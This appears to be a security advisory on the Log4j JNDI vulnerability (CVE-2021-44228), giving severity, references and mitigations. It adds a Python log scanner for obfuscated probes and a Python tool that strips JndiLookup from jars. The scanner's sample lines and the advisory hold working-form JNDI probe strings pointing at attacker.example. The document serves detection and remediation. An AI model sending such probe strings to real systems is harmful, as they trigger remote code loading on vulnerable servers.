New zero-day exploit for the Log4j Java library (CVE-2021-44228) exploited in the wild

In Apache Log4j2 versions 2.0-beta9 through 2.14.1, the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters (for example by placing a string such as ${jndi:ldap://host/path} in an HTTP header that the application logs) can execute arbitrary code loaded from a remote LDAP server when message lookup substitution is enabled. From Log4j 2.15.0, this behavior is disabled by default.
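Because the trigger is simply an attacker-controlled string reaching a logged message, the first thing most teams want is a way to find probes in existing web or application logs. The following is an added example, not code from the original page or from the Log4j project: it normalizes the common nesting tricks (${lower:...}, ${upper:...}, and the ${name:-default} fallback syntax that ${::-j} and ${env:NOPE:-j} rely on) and then flags any line that resolves to a ${jndi:...} lookup. The sample log lines are constructed for the example, and the normalizer deliberately models only those three lookup forms; real-world obfuscation is more varied, so treat a negative result as "no match for these patterns", not as "clean".

```python
import re

# Constructed sample log lines (not real captures): one benign request and four
# Log4Shell probe variants, each carrying the payload in the User-Agent field.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://attacker.example/y}"',
]

# An innermost ${...} lookup, i.e. one with no nested lookup inside it.
INNERMOST = re.compile(r'\$\{([^${}]*)\}')
# After de-obfuscation, a lookup with the jndi: prefix is what we are hunting.
JNDI_PREFIX = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
JNDI_SCHEME = re.compile(r'\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://', re.IGNORECASE)


def _resolve(body):
    """Evaluate one lookup body the way Log4j substitution would for the three
    forms attackers use to hide the letters of 'jndi'. Returns None when the
    lookup is not modelled, so the caller leaves that text untouched."""
    if ':-' in body:
        # ${name:-default}: the default is used when the lookup cannot resolve,
        # which is exactly what ${::-j} and ${env:NOPE:-j} rely on.
        return body.split(':-', 1)[1]
    prefix, sep, arg = body.partition(':')
    if sep and prefix.lower() == 'lower':
        return arg.lower()
    if sep and prefix.lower() == 'upper':
        return arg.upper()
    return None


def normalize(text, max_rounds=32):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line):
    """True when the line, after de-obfuscation, contains a ${jndi:...} lookup."""
    return JNDI_PREFIX.search(normalize(line)) is not None


def probe_scheme(line):
    """The JNDI URI scheme the probe points at (ldap, rmi, dns, ...), or None."""
    match = JNDI_SCHEME.search(normalize(line))
    return match.group(1).lower() if match else None


def scan(lines):
    """Return (index, normalized_line, scheme) for every probe in the input."""
    hits = []
    for index, line in enumerate(lines):
        if is_log4shell_probe(line):
            hits.append((index, normalize(line), probe_scheme(line)))
    return hits


if __name__ == '__main__':
    for index, normalized, scheme in scan(SAMPLE_LINES):
        print(f'line {index}: scheme={scheme} normalized={normalized}')
```

Run it over access logs, proxy logs and any application log that records request headers; the normalized form is what you should search further for (callback host, scheme) when triaging a hit, and the scheme tells you which outbound protocol to look for in egress telemetry.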

Severity: Critical

Base CVSS Score: 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Versions Affected: all versions from 2.0-beta9 to 2.14.1

References:

  1. https://www.randori.com/blog/cve-2021-44228/
  2. https://www.lunasec.io/docs/blog/log4j-zero-day/
  3. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  4. https://logging.apache.org/log4j/2.x/security.html

Mitigations:

Permanent:

Upgrade Log4j to version 2.15.0 or greater. Prefer the newest 2.x release available: 2.16.0 and later disable JNDI by default and remove message lookups entirely, and they address follow-up issues found in 2.15.0.

Temporary:

If your version of Log4j is 2.10.0 or newer:

  • Set the system property log4j2.formatMsgNoLookups to true (for example -Dlog4j2.formatMsgNoLookups=true on the JVM command line), or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. This setting was later found to be incomplete in some non-default configurations (CVE-2021-45046), so treat it as a stopgap until the upgrade is in place.

If your version of Log4j is older than 2.10.0, then you can do either of:

  • Modify every logging pattern layout to say '%m{nolookups}' instead of '%m' in your logging config files. This only protects the layouts you change; any pattern you miss, including ones in configuration shipped inside dependencies, stays vulnerable.
  • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class, or delete the class from the log4j-core jar altogether. Refer to your application's or stack's classloading documentation to understand this behavior, and verify afterwards that the class really is gone from the runtime classpath.
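The steps above branch on the installed Log4j version and, for the oldest releases, come down to removing JndiLookup from log4j-core. The following is an added example, not code from the original page or from the Log4j project, that does the version triage and the class removal as an offline tool: it reads Implementation-Version from the jar's META-INF/MANIFEST.MF (an assumption; log4j-core's manifest carries that attribute, but if yours does not, take the version from the file name), decides whether it falls in the affected range stated above and which temporary measure applies, and writes a copy of the jar with org/apache/logging/log4j/core/lookup/JndiLookup.class removed. The jar used below is constructed in memory with placeholder class bodies so the example runs without a real log4j-core; point it at an actual jar by reading the file's bytes instead.

```python
import io
import re
import zipfile

JNDI_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'


def parse_version(version):
    """'2.14.1' -> (2, 14, 1, ''); '2.0-beta9' -> (2, 0, 0, 'beta9')."""
    match = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?(?:-(.*))?$', version.strip())
    if not match:
        raise ValueError(f'unrecognised version {version!r}')
    major, minor, patch, pre = match.groups()
    return int(major), int(minor), int(patch or 0), pre or ''


def is_affected(version):
    """True for 2.0-beta9 through 2.14.1, the range given in this advisory."""
    major, minor, patch, pre = parse_version(version)
    if major != 2 or (minor, patch) > (14, 1):
        return False
    if (minor, patch) == (0, 0) and pre:
        # 2.0-beta9, later betas and the 2.0 release candidates are in range;
        # betas before 9 are not.
        match = re.match(r'(beta|rc)(\d+)$', pre)
        if match and match.group(1) == 'beta' and int(match.group(2)) < 9:
            return False
    return True


def temporary_mitigation(version):
    """Which of the temporary measures above applies to this version."""
    if not is_affected(version):
        return 'not in the affected range'
    _, minor, patch, _ = parse_version(version)
    if (minor, patch) >= (10, 0):
        return 'set -Dlog4j2.formatMsgNoLookups=true or LOG4J_FORMAT_MSG_NO_LOOKUPS=true'
    return 'use %m{nolookups} in every pattern layout, or remove JndiLookup from log4j-core'


def read_version(jar_bytes):
    """Implementation-Version from the jar manifest, or None if absent."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        manifest = jar.read('META-INF/MANIFEST.MF').decode('utf-8', 'replace')
    for line in manifest.splitlines():
        if line.startswith('Implementation-Version:'):
            return line.split(':', 1)[1].strip()
    return None


def has_jndi_lookup(jar_bytes):
    """The check to run after mitigation: is JndiLookup.class still present?"""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return JNDI_CLASS in jar.namelist()


def strip_jndi_lookup(jar_bytes):
    """Copy the jar without JndiLookup.class (what `zip -d` on the jar does)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, 'w') as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_sample_jar(version='2.14.1'):
    """Constructed stand-in for log4j-core-<version>.jar; class bodies are
    placeholders, only the manifest and entry names matter for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as jar:
        jar.writestr('META-INF/MANIFEST.MF',
                     f'Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n')
        jar.writestr('org/apache/logging/log4j/core/Logger.class', b'\xca\xfe\xba\xbe')
        jar.writestr(JNDI_CLASS, b'\xca\xfe\xba\xbe')
    return buf.getvalue()


if __name__ == '__main__':
    original = build_sample_jar('2.9.1')
    version = read_version(original)
    print(f'{version}: affected={is_affected(version)}; {temporary_mitigation(version)}')
    hardened = strip_jndi_lookup(original)
    print(f'JndiLookup present before={has_jndi_lookup(original)} after={has_jndi_lookup(hardened)}')
```

Keep the original jar until the application has been restarted and has_jndi_lookup has been run against every log4j-core copy on the classpath, including ones bundled inside WAR, EAR and fat-jar files, where the class can hide in a nested archive.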



Published on  and maintained in Cascade.